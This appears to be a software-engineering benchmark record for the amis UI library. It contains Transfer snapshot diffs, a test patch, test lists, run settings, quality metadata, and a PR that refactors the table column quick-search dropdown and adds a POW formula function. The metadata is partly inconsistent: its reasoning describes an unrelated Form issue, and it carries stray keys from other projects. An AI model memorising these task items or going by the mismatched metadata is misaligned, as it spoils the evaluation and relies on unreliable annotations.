exports[`Renderer:transfer follow left mode 2`] = ` title="曹操" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="曹操 " > 曹操 </span> @@ -2609,7 +2655,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="钟无艳" > <span - class="" + class=" 
cxd-Selection-ellipsis-line" + title="钟无艳 " > 钟无艳 </span> @@ -2654,7 +2701,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="打野" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="打野 " > 打野 </span> @@ -2694,7 +2742,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="李白" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="李白 " > 李白 </span> @@ -2734,7 +2783,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="韩信" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="韩信 " > 韩信 </span> @@ -2774,7 +2824,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="云中君" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="云中君 " > 云中君 </span> @@ -2865,7 +2916,10 @@ exports[`Renderer:transfer follow left mode 2`] = ` class="cxd-Tree-itemText" title="战士" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="战士" + > 战士 </span> </span> @@ -2901,7 +2955,10 @@ exports[`Renderer:transfer follow left mode 2`] = ` class="cxd-Tree-itemText" title="曹操" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="曹操" + > 曹操 </span> </span> @@ -3112,7 +3169,8 @@ exports[`Renderer:transfer group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-197 " > option-197 </span> @@ -3146,7 +3204,8 @@ exports[`Renderer:transfer group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-198 " > option-198 </span> @@ -3180,7 +3239,8 @@ exports[`Renderer:transfer group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-199 " > option-199 </span> @@ -3214,7 +3274,8 @@ exports[`Renderer:transfer group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + 
title="option-200 " > option-200 </span> @@ -4943,7 +5004,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-1" + > label-1 </span> </label> @@ -4963,7 +5027,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-3" + > label-3 </span> </label> @@ -4983,7 +5050,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-5" + > label-5 </span> </label> @@ -5003,7 +5073,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-7" + > label-7 </span> </label> @@ -5023,7 +5096,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-9" + > label-9 </span> </label> @@ -5043,7 +5119,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-11" + > label-11 </span> </label> @@ -5063,7 +5142,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-13" + > label-13 </span> </label> @@ -5083,7 +5165,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-15" + > label-15 </span> </label> @@ -5103,7 
+5188,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-17" + > label-17 </span> </label> @@ -5123,7 +5211,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-19" + > label-19 </span> </label> @@ -5575,7 +5666,10 @@ exports[`Renderer:transfer table mode with virtual: result virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-1" + > label-1 </span> </label> @@ -5596,7 +5690,10 @@ exports[`Renderer:transfer table mode with virtual: result virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-3" + > label-3 </span> </label> @@ -5617,7 +5714,10 @@ exports[`Renderer:transfer table mode with virtual: result virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-5" + > label-5 </span> </label> @@ -5638,7 +5738,10 @@ exports[`Renderer:transfer table mode with virtual: result virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-7" + > label-7 </span> </label> @@ -5898,7 +6001,8 @@ exports[`Renderer:transfer tree 1`] = ` title="法师" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师 " > 法师 </span> @@ -5938,7 +6042,8 @@ exports[`Renderer:transfer tree 1`] = ` title="诸葛亮" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="诸葛亮 " > 诸葛亮 </span> @@ -5983,7 +6088,8 @@ exports[`Renderer:transfer tree 1`] = ` title="战士" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="战士 " > 战士 </span> @@ -6023,7 +6129,8 @@ exports[`Renderer:transfer tree 1`] = ` title="曹操" > <span - class="" + 
class=" cxd-Selection-ellipsis-line" + title="曹操 " > 曹操 </span> @@ -6063,7 +6170,8 @@ exports[`Renderer:transfer tree 1`] = ` title="钟无艳" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="钟无艳 " > 钟无艳 </span> @@ -6108,7 +6216,8 @@ exports[`Renderer:transfer tree 1`] = ` title="打野" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="打野 " > 打野 </span> @@ -6148,7 +6257,8 @@ exports[`Renderer:transfer tree 1`] = ` title="李白" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="李白 " > 李白 </span> @@ -6188,7 +6298,8 @@ exports[`Renderer:transfer tree 1`] = ` title="韩信" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="韩信 " > 韩信 </span> @@ -6228,7 +6339,8 @@ exports[`Renderer:transfer tree 1`] = ` title="云中君" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="云中君 " > 云中君 </span> @@ -6432,7 +6544,8 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` title="诸葛亮" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="诸葛亮 " > 诸葛亮 </span> @@ -6472,7 +6585,8 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` title="曹操" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="曹操 " > 曹操 </span> @@ -6512,7 +6626,8 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` title="钟无艳" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="钟无艳 " > 钟无艳 </span> @@ -6561,7 +6676,10 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` <label class="cxd-Selections-label is-invalid" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="w" + > w </span> </label> @@ -6581,7 +6699,10 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` <label class="cxd-Selections-label is-invalid" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="x" + > x </span> </label> @@ -6601,7 +6722,10 @@ exports[`Renderer:transfer with 
showInvalidMatch & unmatched do not add 1`] = ` <label class="cxd-Selections-label is-invalid" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="y" + > y </span> </label> @@ -6621,7 +6745,10 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` <label class="cxd-Selections-label is-invalid" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="z" + > z </span> </label> diff --git a/packages/amis/__tests__/renderers/Form/transfer.test.tsx b/packages/amis/__tests__/renderers/Form/transfer.test.tsx index b27b046ae..ad9b6abfa 100644 --- a/packages/amis/__tests__/renderers/Form/transfer.test.tsx +++ b/packages/amis/__tests__/renderers/Form/transfer.test.tsx @@ -1227,7 +1227,7 @@ test('Renderer:transfer with searchApi', async () => { await wait(300); - const caocao = container.querySelector('span[title=曹操]'); + const caocao = container.querySelector('span[title=李白]'); expect(caocao).toBeNull(); });
[ "evalute:Math" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE" ]
No new interfaces are introduced.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 34, "num_modified_lines": 523, "pr_author": "lurunze1226", "pr_labels": [ "fix" ], "llm_metadata": { "code": "B5", "code_quality": null, "confidence": 0.9, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": true, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1157-R1158", "https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1190", "https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1251" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests adding a `clearPersistDataAfterSubmit` prop to the Form renderer to clear persisted data on navigation. The test patch does modify Form.tsx to call `store.clearLocalPersistData()`, but it also contains a large number of unrelated changes (snapshot updates, UI class tweaks, addition of a new POW function in the formula evaluator, etc.) that are not part of the requested fix. These extraneous modifications cause the test suite to diverge from the original intent, indicating the patch is primarily a collection of unrelated artifacts rather than a focused solution.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Snapshot files for many Select/Transfer components are altered without relation to the Form persist‑data fix", "New tests for a POW math function are added in the formula package", "Numerous UI component files (selection, tree, transfer, etc.) 
receive style and class name changes", "Various editor and core files are modified (e.g., drag‑and‑drop handling, store logic) that are unrelated to the Form issue" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
08412adcb500e92f7ebb55453cd26a028d0c1368
2023-10-12 01:53:11
baidu__amis-8360
diff --git a/examples/components/CRUD/List.jsx b/examples/components/CRUD/List.jsx index 15d65c389..18aef7409 100644 --- a/examples/components/CRUD/List.jsx +++ b/examples/components/CRUD/List.jsx @@ -3,32 +3,18 @@ export default { remark: 'bla bla bla', body: { type: 'crud', - api: '/api/sample', + name: 'thelist', + api: { + method: 'get', + url: '/api/sample', + sendOn: '${mode}' + }, mode: 'list', draggable: true, saveOrderApi: { url: '/api/sample/saveOrder' }, orderField: 'weight', - filter: { - title: '条件搜索', - submitText: '', - body: [ - { - type: 'input-text', - name: 'keywords', - placeholder: '通过关键字搜索', - addOn: { - label: '搜索', - type: 'submit' - } - }, - { - type: 'plain', - text: '这只是个示例, 目前搜索对查询结果无效.' - } - ] - }, affixHeader: true, bulkActions: [ { @@ -63,6 +49,44 @@ export default { ], quickSaveApi: '/api/sample/bulkUpdate', quickSaveItemApi: '/api/sample/$id', + headerToolbar: [ + { + type: 'form', + mode: 'inline', + wrapWithPanel: false, + submitOnChange: true, + submitOnInit: true, + target: 'thelist', + body: [ + { + type: 'select', + name: 'mode', + className: 'mb-0', + selectFirst: true, + options: [ + { + label: '模式 1', + value: 'mode1' + }, + { + label: '模式 2', + value: 'mode2' + } + ] + }, + { + type: 'input-text', + name: 'keywords', + placeholder: '通过关键字搜索', + className: 'mb-0', + addOn: { + label: '搜索', + type: 'submit' + } + } + ] + } + ], listItem: { actions: [ { diff --git a/packages/amis-core/src/WithStore.tsx b/packages/amis-core/src/WithStore.tsx index 6e1c37aee..6c9a0d4b9 100644 --- a/packages/amis-core/src/WithStore.tsx +++ b/packages/amis-core/src/WithStore.tsx @@ -252,7 +252,7 @@ export function HocStoreFactory(renderer: { props.store?.storeType === 'ComboStore' ? 
undefined : syncDataFromSuper( - store.data, + props.data, (props.data as any).__super, (prevProps.data as any).__super, store, diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index dc2df1cc6..d254a63f5 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -61,12 +61,11 @@ export const CRUDStore = ServiceStore.named('CRUDStore') // 因为会把数据呈现在地址栏上。 return createObject( createObject(self.data, { - ...self.query, items: self.items.concat(), selectedItems: self.selectedItems.concat(), unSelectedItems: self.unSelectedItems.concat() }), - {} + {...self.query} ); }, diff --git a/packages/amis-core/src/utils/helper.ts b/packages/amis-core/src/utils/helper.ts index 3d4fa48b4..ebbdfc9e8 100644 --- a/packages/amis-core/src/utils/helper.ts +++ b/packages/amis-core/src/utils/helper.ts @@ -1587,7 +1587,7 @@ export function mapObject( } if (Array.isArray(value)) { - return value.map(item => mapObject(item, fn)); + return value.map(item => mapObject(item, fn, skipFn)); } if (isObject(value)) { @@ -1595,7 +1595,8 @@ export function mapObject( Object.keys(tmpValue).forEach(key => { (tmpValue as PlainObject)[key] = mapObject( (tmpValue as PlainObject)[key], - fn + fn, + skipFn ); }); return tmpValue; diff --git a/packages/amis-editor-core/src/util.ts b/packages/amis-editor-core/src/util.ts index 65f87f69b..4529381b8 100644 --- a/packages/amis-editor-core/src/util.ts +++ b/packages/amis-editor-core/src/util.ts @@ -1063,14 +1063,12 @@ export function getI18nEnabled() { } /** schema 翻译方法 */ -export function translateSchema(schema: any, replaceData?: any) { +export function translateSchema(schema: any, replaceData?: any, skipFn?: any) { replaceData = replaceData || (window as any)?.editorStore?.appCorpusData; if (!isPlainObject(replaceData)) { return schema; } - return mapObject(schema, (item: any) => { - return replaceData[item] || item; - }); + return mapObject(schema, (item: any) => replaceData[item] || 
item, skipFn); } /** 应用级别的翻译方法 */ diff --git a/packages/amis-editor/src/renderer/FormulaControl.tsx b/packages/amis-editor/src/renderer/FormulaControl.tsx index f00316787..b6c03d110 100644 --- a/packages/amis-editor/src/renderer/FormulaControl.tsx +++ b/packages/amis-editor/src/renderer/FormulaControl.tsx @@ -515,16 +515,16 @@ export default class FormulaControl extends React.Component< } else { curRendererSchema.placeholder = '请输入静态值'; } - // 设置popOverContainer - curRendererSchema.popOverContainer = window.document.body; } + JSONPipeOut(curRendererSchema); + // 对 schema 进行国际化翻译 if (this.appLocale && this.appCorpusData) { return translateSchema(curRendererSchema, this.appCorpusData); } - return JSONPipeOut(curRendererSchema); + return curRendererSchema; } @autobind diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index f571ac097..37b95f335 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -268,6 +268,17 @@ 取数据最后一个。 +### POW + +用法:`POW(base, exponent)` + + * `base:number` 基数 + * `exponent:number` 指数 + +返回:`number` 基数的指数次幂 + +返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + ## 文本函数 ### LEFT diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index c3a72cf65..5291b3029 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -465,6 +465,29 @@ export const doc: { }, namespace: '数学函数' }, + { + name: 'POW', + description: + '返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。', + example: 'POW(base, exponent)', + params: [ + { + type: 'number', + name: 'base', + description: '基数' + }, + { + type: 'number', + name: 'exponent', + description: '指数' + } + ], + returns: { + type: 'number', + description: '基数的指数次幂' + }, + namespace: '数学函数' + }, { name: 'LEFT', description: '返回传入文本左侧的指定长度字符串。', diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 7befa4b79..8e44dc051 100644 --- 
a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -13,6 +13,7 @@ import uniqBy from 'lodash/uniqBy'; import isEqual from 'lodash/isEqual'; import isPlainObject from 'lodash/isPlainObject'; import get from 'lodash/get'; +import isNumber from 'lodash/isNumber'; import {EvaluatorOptions, FilterContext, FilterMap, FunctionMap} from './types'; import {FormulaEvalError} from './error'; @@ -978,6 +979,24 @@ export class Evaluator { return arr.length ? arr[arr.length - 1] : null; } + /** + * 返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + * + * @example POW(base, exponent) + * @param {number} base 基数 + * @param {number} exponent 指数 + * @namespace 数学函数 + * + * @returns {number} 基数的指数次幂 + */ + fnPOW(base: number, exponent: number) { + if (!isNumber(base) || !isNumber(exponent)) { + return base; + } + + return Math.pow(base, exponent); + } + // 文本函数 normalizeText(raw: any) { diff --git a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx index 8553ae3c3..258f07b2d 100644 --- a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx +++ b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx @@ -3,9 +3,7 @@ import {RendererProps} from 'amis-core'; import {ActionObject} from 'amis-core'; import {Icon} from 'amis-ui'; import {Overlay} from 'amis-core'; -import {findDOMNode} from 'react-dom'; import {PopOver} from 'amis-core'; -import {ITableStore} from 'amis-core'; import {setVariable, createObject} from 'amis-core'; export interface QuickSearchConfig { @@ -23,35 +21,31 @@ export interface HeadCellSearchProps extends RendererProps { onQuery: (values: object) => void; } -export class HeadCellSearchDropDown extends React.Component< - HeadCellSearchProps, - any -> { - state = { - isOpened: false - }; - - formItems: Array<string> = []; - constructor(props: HeadCellSearchProps) { - super(props); - - this.open = this.open.bind(this); - this.close 
= this.close.bind(this); - this.handleSubmit = this.handleSubmit.bind(this); - this.handleAction = this.handleAction.bind(this); - } - - buildSchema() { - const {searchable, sortable, name, label, translate: __} = this.props; - +export function HeadCellSearchDropDown({ + searchable, + name, + label, + onQuery, + data, + dispatchEvent, + onAction, + classnames: cx, + translate: __, + classPrefix: ns, + popOverContainer, + render +}: HeadCellSearchProps) { + const ref = React.createRef<HTMLElement>(); + const [formSchema, formItems] = React.useMemo(() => { let schema: any; + const formItems: Array<string> = []; if (searchable === true) { schema = { title: '', - controls: [ + body: [ { - type: 'text', + type: 'input-text', name, placeholder: label, clearable: true @@ -59,21 +53,22 @@ export class HeadCellSearchDropDown extends React.Component< ] }; } else if (searchable) { - if (searchable.controls || searchable.tabs || searchable.fieldSet) { + if (searchable.body || searchable.tabs || searchable.fieldSet) { + // todo 删除此处代码,这些都是不推荐的用法 schema = { title: '', ...searchable, - controls: Array.isArray(searchable.controls) - ? searchable.controls.concat() + body: Array.isArray(searchable.body) + ? 
searchable.body.concat() : undefined }; } else { schema = { title: '', className: searchable.formClassName, - controls: [ + body: [ { - type: searchable.type || 'text', + type: searchable.type || 'input-text', name: searchable.name || name, placeholder: label, ...searchable @@ -83,41 +78,11 @@ export class HeadCellSearchDropDown extends React.Component< } } - if (schema && schema.controls && sortable) { - schema.controls.unshift( - { - type: 'hidden', - name: 'orderBy', - value: name - }, - { - type: 'button-group', - name: 'orderDir', - label: __('sort'), - options: [ - { - label: __('asc'), - value: 'asc' - }, - { - label: __('desc'), - value: 'desc' - } - ] - } - ); - } - if (schema) { - const formItems: Array<string> = []; - schema.controls?.forEach( - (item: any) => - item.name && - item.name !== 'orderBy' && - item.name !== 'orderDir' && - formItems.push(item.name) - ); - this.formItems = formItems; + Array.isArray(schema.body) && + schema.body.forEach( + (item: any) => item.name && formItems.push(item.name) + ); schema = { ...schema, type: 'form', @@ -144,64 +109,13 @@ export class HeadCellSearchDropDown extends React.Component< }; } - return schema || 'error'; - } - - handleClickOutside() { - this.close(); - } - - open() { - this.setState({ - isOpened: true - }); - } - - close() { - this.setState({ - isOpened: false - }); - } - - handleAction(e: any, action: ActionObject, ctx: object) { - const {onAction} = this.props; - - if (action.actionType === 'cancel' || action.actionType === 'close') { - this.close(); - return; - } - - if (action.actionType === 'reset') { - this.close(); - this.handleReset(); - return; - } - - onAction && onAction(e, action, ctx); - } - - handleReset() { - const {onQuery, data, name} = this.props; - const values = {...data}; - this.formItems.forEach(key => setVariable(values, key, undefined)); - - if (values.orderBy === name) { - values.orderBy = ''; - values.orderDir = 'asc'; - } - onQuery(values); - } - - async handleSubmit(values: 
any) { - const {onQuery, name, data, dispatchEvent} = this.props; - - if (values.orderDir) { - values = { - ...values, - orderBy: name - }; - } + return [schema || 'error', formItems]; + }, [searchable, name, label]); + const [isOpened, setIsOpened] = React.useState(false); + const open = React.useCallback(() => setIsOpened(true), []); + const close = React.useCallback(() => setIsOpened(false), []); + const handleSubmit = React.useCallback(async (values: any) => { const rendererEvent = await dispatchEvent( 'columnSearch', createObject(data, { @@ -214,78 +128,81 @@ export class HeadCellSearchDropDown extends React.Component< return; } - this.close(); - + close(); onQuery(values); - } + }, []); - isActive() { - const {data, name, orderBy} = this.props; + const handleAction = React.useCallback( + (e: any, action: ActionObject, ctx: object) => { + if (action.actionType === 'cancel' || action.actionType === 'close') { + close(); + return; + } - return orderBy === name || this.formItems.some(key => data?.[key]); - } + if (action.actionType === 'reset') { + close(); + handleReset(); + return; + } - render() { - const { - render, - name, - data, - searchable, - store, - orderBy, - popOverContainer, - classPrefix: ns, - classnames: cx - } = this.props; + onAction && onAction(e, action, ctx); + }, + [] + ); - const formSchema = this.buildSchema(); - const isActive = this.isActive(); + const handleReset = React.useCallback(() => { + const values = {...data}; + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + formItems.forEach(key => setVariable(values, key, undefined)); - return ( - <span - className={cx( - `${ns}TableCell-searchBtn`, - isActive ? 'is-active' : '', - this.state.isOpened ? 'is-opened' : '' - )} - > - <span onClick={this.open}> - <Icon icon="search" className="icon" /> - </span> - {this.state.isOpened ? ( - <Overlay - container={popOverContainer || (() => findDOMNode(this))} - placement="left-bottom-left-top right-bottom-right-top" - target={ - popOverContainer ? 
() => findDOMNode(this)!.parentNode : null - } - show - > - <PopOver - classPrefix={ns} - onHide={this.close} - className={cx( - `${ns}TableCell-searchPopOver`, - (searchable as any).className - )} - overlay - > - { - render('quick-search-form', formSchema, { - data: { - ...data, - orderBy: orderBy, - orderDir: - orderBy === name ? (store as ITableStore).orderDir : '' - }, - onSubmit: this.handleSubmit, - onAction: this.handleAction - }) as JSX.Element - } - </PopOver> - </Overlay> - ) : null} + onQuery(values); + }, [data]); + + const isActive = React.useMemo(() => { + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + return formItems.some(key => data?.[key]); + }, [data]); + + return ( + <span + ref={ref} + className={cx( + `${ns}TableCell-searchBtn`, + isActive ? 'is-active' : '', + isOpened ? 'is-opened' : '' + )} + > + <span onClick={open}> + <Icon icon="search" className="icon" /> </span> - ); - } + {isOpened ? ( + <Overlay + container={popOverContainer || (() => ref.current)} + placement="left-bottom-left-top right-bottom-right-top" + target={popOverContainer ? 
() => ref.current?.parentNode : null} + show + > + <PopOver + classPrefix={ns} + onHide={close} + className={cx( + `${ns}TableCell-searchPopOver`, + (searchable as any).className + )} + overlay + > + { + render('quick-search-form', formSchema, { + data: { + ...data + }, + onSubmit: handleSubmit, + onAction: handleAction + }) as JSX.Element + } + </PopOver> + </Overlay> + ) : null} + </span> + ); } diff --git a/packages/amis/src/renderers/Table/index.tsx b/packages/amis/src/renderers/Table/index.tsx index 62ddc298b..f07dcc238 100644 --- a/packages/amis/src/renderers/Table/index.tsx +++ b/packages/amis/src/renderers/Table/index.tsx @@ -1860,11 +1860,8 @@ export default class Table extends React.Component<TableProps, object> { onQuery={onQuery} name={column.name} searchable={column.searchable} - sortable={false} type={column.type} data={query} - orderBy={store.orderBy} - orderDir={store.orderDir} popOverContainer={this.getPopOverContainer} /> );
chore: 调整列的快速搜索逻辑干掉之前没清理干净的排序相关逻辑 Close: #8342 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 1113e82</samp> Refactored and simplified a table header component that supports searching and filtering. Used React hooks and removed unused code. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 1113e82</samp> > _Sing, O Muse, of the skillful refactorer_ > _Who tamed the `HeadCellSearchDropDown` with hooks_ > _And cleansed the form schema and data of clutter_ > _And cast away the props and code of nooks_ ### Why Close: #8342 ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 1113e82</samp> * Refactor `HeadCellSearchDropDown` component from class to functional, using hooks and removing unused props and fields ([link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L6-R6), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L26-R48), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L62-R62), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L74-R71), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L86-R85), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L147-R118), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L217-R207)) * Replace `controls` with `body` in `searchable` prop and change default type to `input-text` 
([link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L62-R62), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L74-R71)) * Remove `orderBy` and `orderDir` fields from form schema and data, as they are no longer needed ([link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L86-R85), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L147-R118), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L217-R207)) * Use `dispatchEvent` prop to trigger `columnSearch` event before submitting form values ([link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L147-R118)) * Use `ref` to attach span element as container and target for `Overlay` component 